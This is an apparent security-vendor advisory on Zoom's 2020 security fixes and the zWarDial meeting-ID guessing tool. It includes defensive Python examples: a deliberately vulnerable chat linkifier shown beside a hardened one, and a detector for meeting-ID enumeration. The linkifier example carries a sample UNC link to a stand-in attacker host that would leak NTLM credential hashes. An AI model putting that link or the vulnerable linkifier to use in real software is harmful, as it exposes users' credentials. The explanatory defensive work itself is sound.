Zoom Addressing Recent Concerns

The video conferencing app Zoom has exploded in popularity as much of the world began working from home. With that popularity came increased scrutiny from security researchers and the press. In response to the recent concerns about security and privacy, Zoom has outlined in a blog post the steps it has taken to protect its users.

The Zoom post offers tips for organizers to protect meetings from so-called “Zoombombers” who join uninvited to disrupt them. When sharing invitations, avoid posting your Personal Meeting ID (PMI) online; generate a random meeting ID for each event so that a link from a prior event cannot be reused to join every future one. Protect every meeting with a password, and use the “Waiting Room” feature so the host controls who is admitted. More ways to protect Zoom meetings are listed in the post.

Zoom also removed the Facebook SDK from its iOS app, which had been sending device information to Facebook, and changed how and what information is collected from users. Details are in the updated privacy policy, which also received its own blog post explaining the changes in plainer language.

Educators received their own set of tutorials on how to set up a more secure virtual classroom for their students. Features like “Waiting Room” are enabled by default for accounts enrolled in Zoom’s K-12 program, and a dedicated privacy policy for the K-12 program was created as well.

Zoom acknowledged the security concerns around vulnerabilities and its end-to-end encryption claims. It released a software update that stops the Windows client from rendering UNC (Universal Naming Convention) paths such as \\server\share as clickable links; clicking such a link could cause Windows to attempt an SMB connection to an attacker-controlled host and send the user’s NTLM credential hash. The macOS installer issue (a root-privileged preinstall step that allowed local privilege escalation) and the webcam and microphone access issue reported by researcher Patrick Wardle were also addressed.
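To make the UNC link problem concrete, here is an added illustrative example (not Zoom’s code): a chat renderer that turns anything path-like, including UNC paths, into a hyperlink, next to a hardened version that only links http(s) URLs and leaves UNC paths as inert text. The message and the host name `attacker.example` are constructed for the example.

```python
import html
import re

# Windows UNC path such as \\host\share\file: two backslashes, a host, then
# one or more backslash-separated components.
UNC_RE = re.compile(r"\\\\[^\\\s<>]+(?:\\[^\\\s<>]+)+")
# Only web URLs are safe to turn into links.
URL_RE = re.compile(r"https?://[^\s<>]+")

# Constructed sample chat message; the attacker host name is made up.
SAMPLE_MESSAGE = (
    r"Slides are at \\attacker.example\share\deck.pptx "
    "and https://example.com/agenda"
)


def _anchor(target: str) -> str:
    return f'<a href="{target}">{target}</a>'


def linkify_vulnerable(message: str) -> str:
    """Illustrative 'before' behaviour: anything that looks like a URL or a
    UNC path becomes a clickable link. On Windows, clicking the UNC link makes
    the OS open an SMB connection to the named host and attempt NTLM
    authentication, handing the attacker the user's NTLM hash."""
    rendered = html.escape(message, quote=True)
    rendered = URL_RE.sub(lambda m: _anchor(m.group(0)), rendered)
    return UNC_RE.sub(lambda m: _anchor(m.group(0)), rendered)


def linkify_hardened(message: str) -> str:
    """'After' behaviour: only http(s) URLs are linkified; a UNC path is left
    as HTML-escaped plain text that nothing will dereference on click."""
    rendered = html.escape(message, quote=True)
    return URL_RE.sub(lambda m: _anchor(m.group(0)), rendered)


def has_unc_link(rendered_html: str) -> bool:
    """Check for the dangerous output: an anchor whose target is a UNC path."""
    return re.search(r'<a href="\\\\', rendered_html) is not None


if __name__ == "__main__":
    print(linkify_vulnerable(SAMPLE_MESSAGE))
    print(linkify_hardened(SAMPLE_MESSAGE))
```

The hardened renderer allow-lists link schemes rather than trying to block UNC syntax specifically, which is the durable fix: any future path-like syntax the OS might resolve (file://, other drive or share notations) is also left as text.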

Security reporter Brian Krebs described a tool called “zWarDial” that rapidly guesses Zoom meeting IDs and reports the ones that resolve to meetings not protected by a password, along with details such as the organizer name and meeting link. Krebs reported that the tool found approximately 100 open meetings per hour. Zoom responded by saying it would enable passwords by default for all future scheduled meetings.
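Meeting-ID guessing of the kind zWarDial performs leaves a recognisable trace on the service side: one source looking up many IDs that do not exist, with occasional hits. The following added example (not from Zoom or Binary Defense) runs a sliding-window detection over a constructed sample of join-lookup records; the log format, field names and IP addresses are assumptions made for the example.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of meeting-join lookups in an assumed log format (this is
# not a real Zoom log). 203.0.113.7 behaves like a war-dialer: a burst of
# guessed IDs, most invalid, one of which resolves to an open meeting.
# Lines are assumed to be in timestamp order.
SAMPLE_LOG = """\
2020-04-02T14:03:11Z src=203.0.113.7 meeting_id=712345678 result=invalid
2020-04-02T14:03:12Z src=203.0.113.7 meeting_id=490227713 result=invalid
2020-04-02T14:03:12Z src=198.51.100.4 meeting_id=881204455 result=invalid
2020-04-02T14:03:14Z src=203.0.113.7 meeting_id=305598120 result=invalid
2020-04-02T14:03:15Z src=203.0.113.7 meeting_id=667012398 result=valid
2020-04-02T14:03:17Z src=203.0.113.7 meeting_id=119837264 result=invalid
2020-04-02T14:03:20Z src=198.51.100.4 meeting_id=881204456 result=valid
2020-04-02T14:03:22Z src=203.0.113.7 meeting_id=954410087 result=invalid
2020-04-02T14:03:25Z src=203.0.113.7 meeting_id=220378451 result=invalid
2020-04-02T14:05:40Z src=192.0.2.9 meeting_id=553019872 result=invalid
2020-04-02T14:09:02Z src=192.0.2.9 meeting_id=553019873 result=invalid
"""


def parse_line(line: str) -> dict:
    """Split 'TIMESTAMP key=value ...' into a dict with a datetime 'ts'."""
    ts, *fields = line.split()
    rec = dict(f.split("=", 1) for f in fields)
    rec["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return rec


def find_enumerators(log_text: str, threshold: int = 5,
                     window_seconds: int = 60) -> dict:
    """Flag sources whose invalid meeting-ID lookups within any sliding window
    of `window_seconds` reach `threshold`. For each flagged source, report the
    peak in-window count and the valid IDs it found, so those meetings can be
    checked for a password before the attacker joins."""
    window = timedelta(seconds=window_seconds)
    invalid_times = defaultdict(deque)   # src -> timestamps of invalid lookups
    valid_ids = defaultdict(list)        # src -> meeting IDs that resolved
    peak = {}                            # src -> highest in-window count
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        src = rec["src"]
        if rec["result"] == "valid":
            valid_ids[src].append(rec["meeting_id"])
            continue
        q = invalid_times[src]
        q.append(rec["ts"])
        while rec["ts"] - q[0] > window:   # drop lookups older than the window
            q.popleft()
        if len(q) >= threshold:
            peak[src] = max(peak.get(src, 0), len(q))
    return {src: {"peak_invalid": count, "valid_ids_found": valid_ids[src]}
            for src, count in peak.items()}


if __name__ == "__main__":
    for src, info in find_enumerators(SAMPLE_LOG).items():
        print(f"{src}: {info['peak_invalid']} invalid IDs in 60s, "
              f"open meetings found: {info['valid_ids_found']}")
```

A single bad lookup is normal (a typo in an ID), which is why the rule counts invalid lookups per source inside a time window rather than alerting on each one; the valid IDs a flagged source discovered are the meetings that most urgently need a password or waiting room, since those are exactly the ones a war-dialer would hand to a Zoombomber.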

Analyst Notes:

Binary Defense analysts expect that people with malicious intent will continue to find ways to disrupt online meetings on any platform, especially where participants can share video or images with all attendees. Zoom appears to be taking security issues seriously, responding quickly to concerns and patching vulnerabilities. Even so, the security of an online meeting on Zoom or any other service still depends on the organizer understanding and correctly configuring the settings for each meeting. By following the steps outlined in Zoom’s blog post, organizers can protect themselves and their attendees. Protecting every meeting with a password matters because tools such as “zWarDial” randomly guess meeting IDs and let an attacker join any meeting that does not require a password. Binary Defense also recommends promptly applying future updates that address vulnerabilities or other findings from Zoom’s planned third-party security reviews and its enhanced bug bounty program.

Sources:
https://blog.zoom.us/wordpress/2020/04/01/a-message-to-our-users/
https://krebsonsecurity.com/2020/04/war-dialing-tool-exposes-zooms-password-problems/